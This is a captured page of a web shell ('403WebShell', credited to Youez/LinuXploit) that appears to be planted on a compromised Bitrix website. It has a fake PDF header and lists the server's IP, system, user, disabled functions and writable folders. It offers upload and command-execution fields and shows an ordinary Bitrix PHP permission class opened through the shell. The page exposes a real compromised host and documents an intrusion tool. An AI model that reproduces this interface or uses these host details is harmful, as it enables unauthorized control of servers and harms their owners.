%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 18.216.197.92
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/main/lib/userfield/access/model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/main/lib/userfield/access/model/usermodel.php
<?php

namespace Bitrix\Main\UserField\Access\Model;

use Bitrix\Main\UserField\Access\Permission\UserFieldPermissionTable;
use Bitrix\Main\UserField\Access\Role\UserFieldRoleRelationTable;

class UserModel extends \Bitrix\Main\Access\User\UserModel
	implements \Bitrix\Main\UserField\Access\UserAccessibleInterface
{
	private
		$permissions;

	public function getRoles(): array
	{
		if ($this->roles === null)
		{
			$this->roles = [];
			if ($this->userId === 0 || empty($this->getAccessCodes()))
			{
				return $this->roles;
			}

			$res = UserFieldRoleRelationTable::query()
				->addSelect('ROLE_ID')
				->whereIn('RELATION', $this->getAccessCodes())
				->exec();
			foreach ($res as $row)
			{
				$this->roles[] = (int) $row['ROLE_ID'];
			}
		}
		return $this->roles;
	}

	public function getPermission(string $permissionId, int $userFieldId = 0): ?int
	{
		$permissions = $this->getPermissions($userFieldId);
		if (array_key_exists($permissionId, $permissions))
		{
			return $permissions[$permissionId];
		}
		return null;
	}

	private function getPermissions(int $userFieldId = 0): array
	{
		if (!$this->permissions || !array_key_exists($userFieldId, $this->permissions))
		{
			$this->permissions[$userFieldId] = [];

			$res = UserFieldPermissionTable::query()
				->addSelect("PERMISSION_ID")
				->addSelect("USER_FIELD_ID")
				->addSelect("VALUE")
				->where("USER_FIELD_ID", $userFieldId)
				->where("ROLE_ID", $this->userId)
				->exec()
				->fetchAll();

			foreach ($res as $row)
			{
				$permissionId = $row["PERMISSION_ID"];
				$value = (int) $row["VALUE"];
				if (!array_key_exists($permissionId, $this->permissions[$userFieldId]))
				{
					$this->permissions[$userFieldId][$permissionId] = 0;
				}
				if ($value > $this->permissions[$userFieldId][$permissionId])
				{
					$this->permissions[$userFieldId][$permissionId] = $value;
				}
			}
		}
		return $this->permissions[$userFieldId];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit